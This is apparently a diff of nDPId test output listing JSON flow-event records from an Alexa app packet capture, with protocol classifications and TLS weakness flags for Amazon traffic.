-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":180000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976055356,"flow_last_seen":1490976180796,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00935{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 
-00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00935{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 